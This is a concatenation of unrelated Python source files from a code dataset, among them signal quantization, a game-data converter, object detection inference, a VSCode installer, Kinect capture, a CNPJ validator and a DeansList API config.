return vQ, vD\n\ndef Quantificador(vQ, vD, fx):\n vMaxp = np.max(fx) # Amplitude maxima do sinal fx\n vMaxn = np.min(fx) # Amplitude minima do sinal fx\n meioDelta = np.abs(vQ[0] - vQ[1]) / 2\n \n # Condição que veririfica se ambas as aplitudes estão contidas no vQ\n if(vMaxp > vQ[-1] + meioDelta or vMaxn < vQ[0] - meioDelta):\n if(vMaxp > np.abs(vMaxn)):\n vQ, vD = TabelasMidRise(np.log2(len(vQ)), vMaxp)\n else:\n vQ, vD = TabelasMidRise(np.log2(len(vQ)), np.abs(vMaxn))\n\n # Array de valores quantificados\n fq = np.ones(len(fx), dtype=float) * vQ[-1]\n # Array dos idices da tabela de quantificação referentes aos valores quantificados\n fi = np.ones(len(fx), dtype=float) * len(vQ) - 1\n for i in range(len(fx)):\n arrayBin = fx[i] <= vD\n arrTrue = np.where(arrayBin == True)[0]\n if(len(arrTrue) > 0):\n fq[i] = vQ[arrTrue[0]]\n fi[i] = arrTrue[0]\n return fq, fi \n\ndef tabelasmidtread(nBits, vMax):\n delta = 2. * vMax / 2.**nBits\n quantificacionValues = np.arange(-vMax + (delta), vMax + delta, delta)\n decisionValues = np.arange(-vMax + (delta), vMax + (delta - (delta / 2)), delta)\n return quantificacionValues, decisionValues, delta\n\ndef SNR(signalIn, R, vMax):\n vMax = np.max(signalIn)\n quanti, deci = TabelasMidRise(R, vMax)\n signalOut, used = Quantificador(signalIn, quanti, deci)\n Px = np.sum([(signalIn**2) / 2])\n PRuido = vMax**2 / (3 * (2**(2 * R)))\n SNRT = 6. * R + 10. * np.log10((3. * Px) / (vMax**2))\n SNRP = 10. * np.log10(Px / PRuido)\n return SNRT, SNRP\n \ndef main():\n # exercicio 3\n # a)\n vMax = 20\n fx = np.arange(-vMax, vMax + .5, 0.5)\n nBits = 3\n vQ, vD = TabelasMidRise(nBits, vMax)\n print(\"fx\", fx)\n print(\"Q\", vQ)\n print(\"D\", vD)\n fq, fi = Quantificador(vQ, vD, fx)\n print(\"fq\", fq)\n print(\"fi\", fi)\n plt.plot(fq)\n plt.plot(fx)\n \n # b)\n eq = fx - fq\n plt.figure()\n plt.plot(eq)\n plt.figure()\n hx, b = np.histogram(eq, 10)\n plt.bar(b[:-1], hx, width=.20 , color=[.9, .9, .9])\n \n # c)\n vMax = 20.\n fx = np.arange(-vMax, vMax + .5, 0.5)\n p = sum(fx * fx) / len(fx)\n R = np.arange(3,9,1)\n SNRT = np.arange(len(R), dtype='float')\n SNRP = np.arange(len(R), dtype='float')\n \n for i in range(len(R)):\n vQ, vD = TabelasMidRise(R[i], vMax)\n print(\"fx\", fx)\n print(\"Q\", vQ)\n print(\"D\", vD)\n fq, fi = Quantificador(vQ, vD, fx)\n print(\"fq\", fq)\n print(\"fi\", fi)\n plt.figure()\n plt.plot(fq)\n plt.plot(fx)\n eq = fx - fq\n peq = sum(eq * eq) / len(eq)\n SNRT[i] = 6. * R[i] + 10. * np.log10((3. * p) / (vMax**2))\n SNRP[i] = 10. * np.log10(p/peq)\n \n plt.figure()\n plt.plot(R, SNRT)\n plt.plot(R, SNRP)\n \n # exercicio 4\n # a)\n #rate, data = wav.read(\"D:/LEIM/3_Semestre/CPS/pythonWorkspace_1617/wavFiles/guitarra.wav\", \"r\")\n","sub_path":"trabalhoPratico02/trabalho_pratico02.py","file_name":"trabalho_pratico02.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"603643196","text":"import sys\nsys.path.append('luadata')\nimport luadata\n\nimport xml.etree.ElementTree as ET\nimport io\nimport glob\n# load xml\n\npatetc={\n \"SKL_SET_TARGET_CIRCLE\":\"Circle\",\n \"SKL_SET_TARGET_SQUARE\": \"Square\",\n \"SKL_SET_TARGET_FAN\": \"Fan\",\n}\npatfrm={\n \"CIRCLE\":\"Circle\",\n \"SQUARE\": \"Square\",\n \"FAN\": \"Fan\",\n}\nPSEUDOFORECAST_DATA = {}\nfilelist=glob.glob(\"E:\\\\Analyze\\\\newtos\\\\extract\\\\skill_bytool.ipf\\\\*.xml\")\nfor filename in filelist:\n with open(filename,encoding='utf_8') as f:\n data=f.read()\n\n root=ET.fromstring(data)\n #skills = root[0];\n def pick(attr,name):\n if name in attr:\n return attr[name]\n else:\n return 0\n def skilltable(frm,mode):\n if mode==\"MainSkl\":\n #print(str(pick(frm.attrib,\"Name\")))\n return {\n \"timestart\":int(pick(frm.attrib,\"Time\")),\n \"timeend\":int(pick(frm.attrib,\"AniTime\")),\n \"angle\":float(pick(frm.attrib,\"SklAngle\")),\n \"width\":float(pick(frm.attrib,\"Width\")),\n \"length\":float(pick(frm.attrib,\"Length\")),\n \"typ\": patfrm[pick(frm.attrib, \"Type\")],\n \"rotate\":float(pick(frm.attrib,\"RotAngle\")),\n \"dist\": float(pick(frm.attrib, \"Dist\")),\n \"postype\": int(pick(frm.attrib, \"PosType\")),\n \"mode\":mode\n }\n elif mode==\"Scp\":\n return {\n \"timestart\":0,\n \"timeend\":1,\n \"angle\": float(pick(frm.attrib, \"SklAngle\")),\n \"width\": float(pick(frm.attrib, \"Width\")),\n \"length\": float(pick(frm.attrib, \"Length\")),\n \"typ\": patetc[pick(frm.attrib, \"Type\")],\n \"rotate\":float(pick(frm[\"Pos\"].attrib,\"RotAngle\")),\n \"mode\":mode\n }\n return {}\n for skill in root:\n #if( skill.attrib[\"Name\"].startswith(\"Mon_\")):\n # continue\n #if (skill.attrib[\"Name\"].find(\" \")!=-1 or skill.attrib[\"Name\"].find(\"-\")!=-1):\n # continue\n mainskil=skill.find(\"MainSkl\")\n if mainskil:\n hitlist=mainskil.find(\"HitList\")\n if(hitlist):\n frms = hitlist.findall(\"Frame\")\n for frm in frms:\n name = skill.attrib[\"Name\"]\n name=name.replace(\"-\",\"_\")\n if(not name in PSEUDOFORECAST_DATA):\n PSEUDOFORECAST_DATA[name]=[]\n\n PSEUDOFORECAST_DATA[name].append(skilltable(frm,\"MainSkl\"))\n # etclist = mainskil.find(\"EtcList\")\n # if (etclist):\n # scps = etclist.findall(\"Scp\")\n # for scp in scps:\n # if(pick(scp.attrib,\"Scp\")==\"SKL_SET_TARGET_CIRCLE\"):\n #\n # if (not pick(skill.attrib,\"Scp\") in PSEUDOFORECAST_DATA):\n # PSEUDOFORECAST_DATA[skill.attrib[\"Name\"]] = []\n # PSEUDOFORECAST_DATA[skill.attrib[\"Name\"]].append(skilltable(scp,\"Scp\"))\n\nluadata.serialize(PSEUDOFORECAST_DATA, \"skills.lua\")\nwith open(\"skills.lua\",\"a\") as f:\n f.write(\"\\nPSEUDOFORECAST_rawdata=data\")","sub_path":"_stockyard/pseudoforecast/converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"454664346","text":"# Run detection on a COCO-format dataset\r\n# With two seperate configurations for the detectors\r\nraise Exception('Not updated with new detection interface')\r\nimport argparse, json, pickle\r\n\r\nfrom os.path import join, isfile, basename\r\nfrom glob import glob\r\n\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport torch\r\nimport mmcv\r\n\r\nfrom mmdet.models import build_detector\r\nfrom mmdet.apis import init_detector, inference_detector\r\n\r\nfrom pycocotools.coco import COCO\r\nimport pycocotools.mask as maskUtils\r\n\r\nimport sys; sys.path.insert(0, '..'); sys.path.insert(0, '.')\r\nfrom util import mkdir2\r\nfrom dbcode.dbinfo import coco2av, coco2kmots, kmots_classes, av_classes\r\nfrom det import parse_mmdet_result, vis_det, eval_ccf\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data-root', type=str, required=True)\r\n parser.add_argument('--annot-path', type=str, required=True)\r\n parser.add_argument('--det1-stride', type=float, default=None)\r\n parser.add_argument('--det1-in-scale', type=float, required=True)\r\n parser.add_argument('--det2-in-scale', type=float, required=True)\r\n parser.add_argument('--no-mask', action='store_true', default=False)\r\n parser.add_argument('--out-dir', type=str, required=True)\r\n parser.add_argument('--vis-dir', type=str, default=None)\r\n parser.add_argument('--vis-scale', type=float, default=1)\r\n parser.add_argument('--config', type=str, required=True)\r\n parser.add_argument('--weights', type=str, required=True)\r\n\r\n # parser.add_argument('--config', type=str, default='../mmdetection/configs/htc/htc_dconv_c3-c5_mstrain_400_1400_x101_64x4d_fpn_20e.py')\r\n # parser.add_argument('--weights', type=str, default='/data/mengtial/ModelZoo/mmdet/htc_dconv_c3-c5_mstrain_400_1400_x101_64x4d_fpn_20e_20190408-0e50669c.pth')\r\n # parser.add_argument('--config', type=str, default='../mmdetection/configs/mask_rcnn_r50_fpn_1x.py')\r\n # parser.add_argument('--weights', type=str, default='/data/mengtial/ModelZoo/mmdet/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth')\r\n \r\n parser.add_argument('--no-eval', action='store_true', default=False)\r\n parser.add_argument('--overwrite', action='store_true', default=False)\r\n\r\n opts = parser.parse_args()\r\n return opts\r\n\r\ndef main():\r\n assert torch.cuda.device_count() == 1 # mmdet only supports single GPU testing\r\n\r\n opts = parse_args()\r\n\r\n mkdir2(opts.out_dir)\r\n vis_out = bool(opts.vis_dir)\r\n if vis_out:\r\n mkdir2(opts.vis_dir)\r\n\r\n db = COCO(opts.annot_path)\r\n n_class = len(db.cats)\r\n seqs = db.dataset['sequences']\r\n seq_dirs = db.dataset['seq_dirs']\r\n if 'KMOTS' in opts.data_root:\r\n class_mapping = coco2kmots\r\n class_names = kmots_classes\r\n elif 'ArgoVerse' in opts.data_root:\r\n class_mapping = coco2av\r\n class_names = av_classes\r\n else:\r\n raise Exception('Unknown dataset')\r\n\r\n config = mmcv.Config.fromfile(opts.config)\r\n # mainly for SSD\r\n config.data.test.resize_keep_ratio = True\r\n if opts.no_mask:\r\n if 'mask_head' in config.model:\r\n config.model['mask_head'] = None\r\n\r\n model = init_detector(config, opts.weights)\r\n model.eval()\r\n\r\n results_ccf = []\r\n\r\n for iid, img in tqdm(db.imgs.items()):\r\n img_name = img['name']\r\n\r\n sid = img['sid']\r\n seq_name = seqs[sid]\r\n\r\n img_path = join(opts.data_root, seq_dirs[sid], img_name)\r\n I = mmcv.imread(img_path)\r\n \r\n if iid % opts.det1_stride == 0:\r\n model.cfg.data.test.img_scale = opts.det1_in_scale\r\n else:\r\n model.cfg.data.test.img_scale = opts.det2_in_scale\r\n\r\n result = inference_detector(model, I)\r\n bboxes, scores, labels, masks = parse_mmdet_result(result, class_mapping, n_class)\r\n\r\n if vis_out:\r\n vis_path = join(opts.vis_dir, seq_name, img_name[:-3] + 'jpg')\r\n if opts.overwrite or not isfile(vis_path):\r\n vis_det(\r\n I, bboxes, labels,\r\n class_names, masks, scores,\r\n out_scale=opts.vis_scale,\r\n out_file=vis_path\r\n )\r\n\r\n # convert to coco fmt\r\n bboxes[:, 2:] -= bboxes[:, :2]\r\n bboxes = bboxes.tolist()\r\n\r\n for i in range(len(bboxes)):\r\n result_dict = {\r\n 'image_id': iid,\r\n 'bbox': bboxes[i],\r\n 'score': scores[i],\r\n 'category_id': labels[i],\r\n }\r\n if masks is not None:\r\n result_dict['segmentation'] = masks[i]\r\n results_ccf.append(result_dict)\r\n\r\n out_path = join(opts.out_dir, 'results_ccf.pkl')\r\n if opts.overwrite or not isfile(out_path):\r\n pickle.dump(results_ccf, open(out_path, 'wb'))\r\n\r\n if not opts.no_eval:\r\n eval_summary = eval_ccf(db, results_ccf)\r\n out_path = join(opts.out_dir, 'eval_summary.pkl')\r\n if opts.overwrite or not isfile(out_path):\r\n pickle.dump(eval_summary, open(out_path, 'wb'))\r\n\r\n if vis_out:\r\n print(f'python vis/make_videos.py \"{opts.vis_dir}\"')\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"argo_data_scripts/det/det_2cfg.py","file_name":"det_2cfg.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282678935","text":"import re\nimport os\nfrom pathlib import Path\n\nprefix = \"\\\\\".join(os.getenv('MINGW_PREFIX','C:\\\\msys64\\\\mingw64').split('/')[:-1]) + '\\\\'\nprefix = prefix.replace('\\\\','\\\\\\\\') # needed for regex\n\npkgdir = os.getenv(\"pkgdir\").replace('/','\\\\')\n\nreg = re.compile(f'(?PINSTALL(\\S*)) = {prefix}(?P\\S*)')\n\ndef do(a: re.Match):\n return f\"{a.group('key')} = {a.group('value')}\"\n\nwith open('Makefile') as f:\n c = f.read()\n c = reg.sub(do,c)\nwith open('Makefile','w') as f:\n f.write(c)\n","sub_path":"mingw-w64-perl-win32-console/patchmakefile.py","file_name":"patchmakefile.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"193412972","text":"\"\"\"\n.. module:: teamcontrol.control\n :platform: Unix, Windows\n :synopsis: Main application controller\n\n.. moduleauthor:: Caio Romao \n\n\"\"\"\n\n\nclass TeamController():\n \"\"\"Main workflow controlller for TeamControl.\n \"\"\"\n\n def __init__(self, scm, config, team_name=None):\n \"\"\"Constructor.\n\n :param scm: source control manager instance.\n :type scm: :class:`~teamcontrol.scm.SCM`\n :param config: configuration manager instance.\n :type config: :class:`~teamcontrol.config.TeamControlConfig`\n :param team_name: name of the default team to list\n \"\"\"\n self._team_name = team_name\n self._team_users_map = {}\n self._rule_team_relation = []\n self.__scm = scm\n\n # build internal data structures\n for name, users, rules in config.get_teams():\n self._team_users_map[name] = set(users)\n for rule in rules:\n self._rule_team_relation.append((rule, name))\n\n def _get_interested_users(self, filename):\n \"\"\"Retrieves a list of team members that have rules matching\n the given filename.\n\n :param filename: filename to test for matching rules.\n :rtype: set.\n \"\"\"\n users = set()\n for rule, team in self._rule_team_relation:\n if rule.match(filename):\n users |= self._team_users_map[team]\n return users\n\n def get_emails(self, input_data):\n \"\"\"Parses input data and retrieves a list of users based on\n team rules that match each filename extracted from the input\n data.\n\n If :attribute:`_team_name` is set (Through the\n :method:`contructor __init__`), include every member from it\n regardless of the given data.\n\n :param input_data: data to be parsed. Command-line parameters,\n for example.\n :type input_data: list\n :rtype: set.\n \"\"\"\n emails = set()\n if self._team_name is not None:\n emails = self._team_users_map.get(self._team_name, set())\n\n changed_files = self.__scm.get_files(input_data)\n for filename in changed_files:\n emails |= self._get_interested_users(filename)\n\n return emails\n","sub_path":"teamcontrol/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"81205219","text":"# coding=utf-8\n\nimport os, sys\nimport unittest\nfrom HTMLTestRunner import HTMLTestRunner\n\n\nif __name__ == \"__main__\":\n # 构造测试套件\n #testsuit = unittest.TestSuite()\n\n #testsuit.addTest(unittest.makeSuite(SubBaidu.Baidu))\n\n # 定义测试报告存放路径\n report_file = 'Report_Screenshot.html' # 固定文件名\n # report_file = 'result_C-APP' + str(datetime.now().strftime('%Y%m%d_%H%M%S')) + '.html' # 文件名加时间戳(文件名精确到时分 例:result_20171009_1505.html)\n\n fp = open(report_file, 'wb')\n\n # 定义测试报告\n print(\"HTML_Report.....\")\n runner = HTMLTestRunner(stream=fp,\n title='DEMO Testing',\n description='Result:',\n verbosity=2)\n test_app = \"./Test_case\"\n discover = unittest.defaultTestLoader.discover(test_app, pattern='Sub_*.py')\n runner.run(discover)\n\n # 关闭测试报告\n fp.close()\n","sub_path":"selenium_python自动化实战(练习)/HTML_Report/python3/selenium_web/1.Testcase目录_存放全部脚本/run_all_test.py","file_name":"run_all_test.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469755214","text":"\"\"\"Install VSCode Task\nThis task downloads the latest stable version\nof VSCode, unzips it and moves the extracted file\nto Applications folder.\n\"\"\"\nfrom recipes.utils.task_logger import Logger\nimport recipes.actions.folder as folder\nimport recipes.actions.file as file\n\nFILE_NAME = 'vscode.zip'\nTMP_NAME = '.tmp'\nURL = 'https://go.microsoft.com/fwlink/?LinkID=620882'\nAPP_NAME = 'Visual Studio Code.app'\nAPPLICATIONS_PATH = '/Applications'\n\nlogger = Logger('VSCode')\n\n\ndef main():\n logger.start()\n\n if file.exists(APPLICATIONS_PATH + '/' + APP_NAME):\n logger.end()\n else:\n folder.recreate(TMP_NAME)\n file.download(URL, FILE_NAME, TMP_NAME)\n file.unzip(TMP_NAME + '/' + FILE_NAME)\n file.safely_move(APP_NAME, TMP_NAME, '/Applications')\n folder.remove(TMP_NAME)\n logger.end()\n","sub_path":"recipes/install_vscode.py","file_name":"install_vscode.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"97231708","text":"from manimlib.imports import *\nfrom thD7.video_scenes import *\n\nclass SS_1_Epilogue(Epilogue):\n CONFIG = {\n 'bgm': [\n r'Arryo Seco~-~Curtis Schweitzer\\\\',\n ],\n 'acknowledgement': None,\n }\n\nclass Words(Scene):\n def construct(self):\n set_gpus([0,1])\n\n words=[\n '信号与系统',\n '是众多工科的基础课程',\n '其地位其实不亚于高数、概统和线代',\n '在最初没有学这门课的时候',\n '我是有一点点害怕的',\n '但事实上其实并没有想象的那么难',\n '但由于教材、老师等原因',\n '很多内容的实质被掩盖在公式和计算之下',\n '这也是我创作这个系列的原因',\n '系列内容是基于我之前的笔记和个人的理解',\n '当然了,还参考了很多优秀的资源',\n '仅仅希望对观者有所帮助',\n '这些视频是用Manim制作的',\n '在此要特别感谢3b1b大神的开源库!',\n '另外,与3b1b不同的是',\n '这不是科普视频',\n '我觉得还是挺硬核的',\n '不过我觉得',\n '与其说Grant Sanderson是数学的科普者',\n '他更像是数学的布道者!'\n ]\n\n words_g=VGroup(*[TextMobject(i) for i in words])\n\n self.play(Write(words_g[0]))\n for i,k in enumerate(words_g):\n if i == 0:\n continue\n self.wait(2)\n self.play(FadeOut(words_g[i-1]),Write(k))\n\n\nclass Series(Scene):\n def construct(self):\n set_gpus([0,1])\n\n title=Title('\\\\LARGE Signals and Systems Series')\n self.play(Write(title))\n\n series_titles=[\n '\\\\sz{1} Time-Invariant Property of Systems',\n '\\\\sz{2} Understanding Convolution',\n '\\\\sz{3} Calculating Convolution',\n '\\\\sz{4} From Fourier Series to Fourier Transformation',\n '\\\\sz{5} Periodic Fourier Transformation and Sampling',\n '\\\\sz{6} Laplace Transformation',\n '\\\\sz{7} Pole-zero Diagrams and Frequency Response'\n ]\n series=VGroup(\n *[TextMobject('\\\\# '+i) for i in series_titles]\n ).arrange(DOWN,buff=0.2)\\\n .set_y((title.get_bottom()[1]-FRAME_Y_RADIUS)/2)\n left=series.get_left()\n for i in series:\n i.align_to(left,LEFT)\n\n self.play(LaggedStart(*[FadeIn(i) for i in series]),run_time=7)","sub_path":"thD7/ss/ss_0.py","file_name":"ss_0.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328781685","text":"def t(n='', tt=''):\n\timport clipboard\n\t\"\"\"\n\t(integer, text) -> clipboard\n\tthis function take 2 arguments\n\t1- n, by default empty string\n\t2- text\n\tcombine these 2 arguments and copy the reslut to the clipboard, so you can paste to another file. \n\t\n\t>>> t(49, 'The Holy Quran.mp4')\n\t49_The_Holy_Quran.mp4 # Note the resul is copied to clipbord, nothing you see on your screen.\n\t\"\"\"\n\tif n:\n\t\tclipboard.copy(str(n)+\"-\"+tt.replace(' ', '_').replace(\"'\", '').strip()+'.mp4')\n\telse:\n\t\tif tt:\n\t\t\tclipboard.copy(tt.replace(' ', '_').replace(\"'\", '').strip()+'.mp4')\n\t\telse:\n\t\t\treturn \"please Enter at least one argument\"\n\n","sub_path":"python_clipboard.py","file_name":"python_clipboard.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"92464278","text":"# import the necessary modules\nimport freenect\nimport cv2\nimport numpy as np\nimport math\nimport time\nimport webbrowser\nimport Queue\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.externals import joblib\nimport os\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport sys\nimport cPickle\nfrom multiprocessing import Pool\nimport glob, ntpath\nimport featuresHOG\nimport scipy.cluster.hierarchy as hier\nimport scipy.spatial.distance as dist\nfrom matplotlib import pyplot as plt\nimport sklearn.decomposition\nimport sklearn.ensemble\nimport Image\n#framesd = Queue.Queue(20)\n#framesr = Queue.Queue(20)\nframesd = []\nframesr = []\nfd1 = []\nfr1 = []\nfd2 = []\nfr2 = []\nfd3 = []\nfr3 = []\nfd4 = []\nfr4 = []\n#import playsound\n'''working!!!'''\n\n# function to get RGB image from kinect\ndef get_video():\n array, _ = freenect.sync_get_video()\n array = cv2.cvtColor(array, cv2.COLOR_RGB2BGR)\n return array\n\n\n# function to get depth image from kinect\ndef get_depth(flag):\n global framesd, framesr\n loopnum = 0\n i = 0\n #flag = 0\n while(True):\n print(loopnum)\n depth, _ = freenect.sync_get_depth() #depth is a numpy array which stores the depth value of each pixel captured\n rgbframes, _ = freenect.sync_get_video() #rgbframes is a numpy array which stores rgb value of each pixel captured\n rgbframes = cv2.cvtColor(rgbframes, cv2.COLOR_RGB2BGR) \n #print(depth)\n depth_mask = np.where(depth < 650, 255, 0).astype(np.uint8)\n cv2.imshow('Segmented Image', depth_mask)\n cv2.imshow('RGB', rgbframes)\n for i in range(depth_mask.shape[0]):\n for j in range(depth_mask.shape[1]):\n if depth_mask[i][j]==255:\n flag = 1\n cv2.waitKey(100)\n break\n if flag == 1:\n break\n if flag == 1:\n framesd.append(depth_mask)\n framesr.append(rgbframes)\n loopnum = loopnum+1\n cv2.waitKey(100)\n if(loopnum==20):\n break\n print('$$$$$')\n \n \ndef masking(ind):\n global fd1, fr1, fd2, fr2, fd3, fr3, fd4, fr4\n #frameNumd = 0\n #print(ind)\n if ind == 1:\n framesd = fd1\n framesr = fr1\n frameNumd = 0\n frameNumr = frameNumd\n if ind == 2:\n framesd = fd2\n framesr = fr2\n frameNumd = 5\n frameNumr = frameNumd\n if ind == 3:\n framesd = fd3\n framesr = fr3\n frameNumd = 10\n frameNumr = frameNumd\n if ind == 4:\n framesd = fd4\n framesr = fr4\n frameNumd = 15\n frameNumr = frameNumd\n m = 0\n print(framesd[m].shape)\n while(m<5):\n depth_mask=framesd[m]\n rgbframes=framesr[m]\n #print(ind)\n #print('m=', m, 'ind=', ind)\n mask = np.zeros(rgbframes.shape, np.uint8)\n a, b = depth_mask.shape\n #print('ind=', ind, 'm=', m, a, b)\n for i in range(a):\n for j in range(b):\n if(depth_mask[i][j] == 255):\n mask[i][j][0] = 1\t\n mask[i][j][1] = 1\n mask[i][j][2] = 1\n thresh1=depth_mask.copy() \n \n masked_image = np.multiply(mask,rgbframes)\n print(m)\n \n #cv2.imshow('Thresholded', thresh1)\n frameNumd = frameNumd + 1\n fileName = './newData/Depth/Depthclap/Sub7/7clap{:d}.jpg'.format(frameNumd)\n cv2.imwrite(filename=fileName,img=thresh1)\n image = Image.open(fileName)\n x,y = image.size\n new_dimensions = (x/6, y/6)\n output = image.resize(new_dimensions, Image.ANTIALIAS)\n output.save(fileName, \"JPEG\", quality = 95)\n m = m+1\n #cv2.waitKey(3000)\n \n \n #return (3,frameNumd, frameNumr)\n\n\nif __name__ == \"__main__\":\n global framesd, framesr\n matrix=[0,0,0,0]\n value=2\n i=0\n flag = 0\n setq = 1\n #while(True):\n get_depth(flag)\n print(\"data acquired\")\n jobs = [1, 11]\n num = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n fd1 = framesd[0:5]\n fd2 = framesd[5:10]\n fd3 = framesd[10:15]\n fd4 = framesd[15:20]\n fr1 = framesr[0:5]\n fr2 = framesr[5:10]\n fr3 = framesr[10:15]\n fr4 = framesr[15:20]\n p = Pool(4)\n p.map(masking, (i for i in [1, 2, 3, 4]) )\n\n \n \n","sub_path":"newkinect.py","file_name":"newkinect.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191176531","text":"def sel_sort(a):\n n = len(a)\n\n for i in range(0, n - 1):\n\n min_idx = i\n\n for j in range(i + 1, n):\n\n if a[j] < a[min_idx]:\n min_idx = j\n\n a[i], a[min_idx] = a[min_idx], a[i]\n\n print(a)\n\ndef selection_sort(a):\n n = len(a)\n for i in range(0, n-1):\n idx = i\n for j in range(i+1, n):\n if a[j] < a[idx]:\n idx = j\n a[i], a[idx] = a[idx], a[i]\n print(a)\n\nd = [7, 4, 2, 11, 50]\nselection_sort(d)\n","sub_path":"D1112/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270815773","text":"import re\r\nentrada = str(input())\r\nlista = []\r\nlista.append(entrada)\r\n\r\ndef calculocnpj(v):\r\n formatado = \"\"\r\n final = v[16:18]\r\n container = []\r\n container2 = []\r\n print(final)\r\n for i in range (0,16):\r\n if(v[i] != '.' and v[i] != '/' and v[i] != '-'):\r\n container.append(int(v[i])) \r\n \r\n for i in range (0,17):\r\n if(v[i] != '.' and v[i] != '/' and v[i] != '-'):\r\n container2.append(int(v[i])) \r\n\r\n \r\n numero1 = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\r\n soma1 = 0\r\n\r\n for i in range (0,12):\r\n aux1 = container[i]*numero1[i]\r\n soma1 = soma1 + aux1\r\n \r\n div1 = (soma1 % 11)\r\n \r\n if(div1 < 2):\r\n digito1 = 0\r\n else:\r\n digito1 = (11-div1) \r\n \r\n numero2 = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\r\n soma2 = 0\r\n \r\n for i in range (0,13):\r\n aux2 = container2[i]*numero2[i]\r\n soma2 = soma2 + aux2\r\n \r\n div2 = (soma2 % 11)\r\n \r\n if(div2 < 2):\r\n digito2 = 0\r\n else:\r\n digito2 = (11-div2)\r\n \r\n formatado = str(digito1) + str(digito2)\r\n print(formatado)\r\n if(formatado == final):\r\n return True\r\n else:\r\n return False\r\n\r\ndef formatocnpj (e):\r\n if(re.match(r'([0-9]{2}[\\.][0-9]{3}[\\.][0-9]{3}[/][0-9]{4}[-][0-9]{2}$)', e)):\r\n if(calculocnpj(e)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n \r\nif((formatocnpj(lista[0]) == True)):\r\n print(True)\r\nelif((formatocnpj(lista[0]) == False)):\r\n print(False)","sub_path":"pp1/5.2.cnpj.py","file_name":"5.2.cnpj.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"360649467","text":"from datetime import datetime, timedelta\nimport pytz\n\nsave_path = ''\ntz = pytz.timezone('')\ntoday = datetime.now(tz).date()\ntoday_str = today.strftime('%Y-%m-%d')\nyesterday_str = today - timedelta(days=1)\nyesterday_str = yesterday_str.strftime('%Y-%m-%d')\n\n\"\"\"\nDeansList variables\n\"\"\"\nbase_url = ''\napi_keys = [\n '',\n ]\n\nendpoints = [\n ## FLAT JSON - PARAMETERS ##\n {'endpoint':'/api/beta/export/get-behavior-data.php',\n 'name':'behavior',\n 'params':{'sdt':'2016-07-01', 'edt':yesterday_str, 'UpdatedSince':yesterday_str, 'IncludeDeleted':'Y'}},\n ## FLAT JSON - NO PARAMETERS ##\n {'endpoint':'/api/v1/referrals', 'name':'referrals'},\n {'endpoint':'/api/beta/export/get-comm-data.php', 'name':'communication'},\n {'endpoint':'/api/v1/followups', 'name':'followups'},\n {'endpoint':'/api/beta/export/get-roster-assignments.php', 'name':'roster_assignments'},\n {'endpoint':'/api/v1/lists', 'name':'lists'},\n {'endpoint':'/api/v1/rosters', 'name':'rosters_all'},\n {'endpoint':'/api/beta/export/get-users.php', 'name':'users'},\n ## CONTAIN NESTED JSON ##\n {'endpoint':'/api/v1/incidents', 'name':'incidents'},\n # ## UNUSED ##\n # {'endpoint':'/api/beta/export/get-homework-data.php', 'name':'homework', 'array_cols':[]},\n # {'endpoint':'/api/v1/suspensions', 'name':'suspensions', 'nested':1, 'array_cols':[]},\n # {'endpoint':'/api/v1/students', 'name':'students', 'nested':0},\n # {'endpoint':'/api/v1/daily-attendance', 'name':'daily_attendance', 'nested':0},\n # {'endpoint':'/api/v1/class-attendance', 'name':'class_attendance', 'nested':0},\n # {'endpoint':'/api/v1/terms', 'name':'terms', 'nested':1},\n # {'endpoint':'/api/beta/bank/get-bank-book.php', 'name':'points_bank', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}', 'name':'list_sessions_all', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}/{SessionID}', 'name':'list_sessions_id', 'nested':1},\n # {'endpoint':'/api/v1/lists/{ListID}/{SessionDate}', 'name':'list_sessions_date', 'nested':1},\n # {'endpoint':'/api/v1/rosters/(RosterID)', 'name':'rosters_single', 'nested':1},\n ]\n\n\"\"\"\nall together now!\n\"\"\"\nCONFIG = {\n 'base_url': base_url,\n 'api_keys': api_keys,\n 'endpoints': endpoints,\n 'save_path': save_path\n 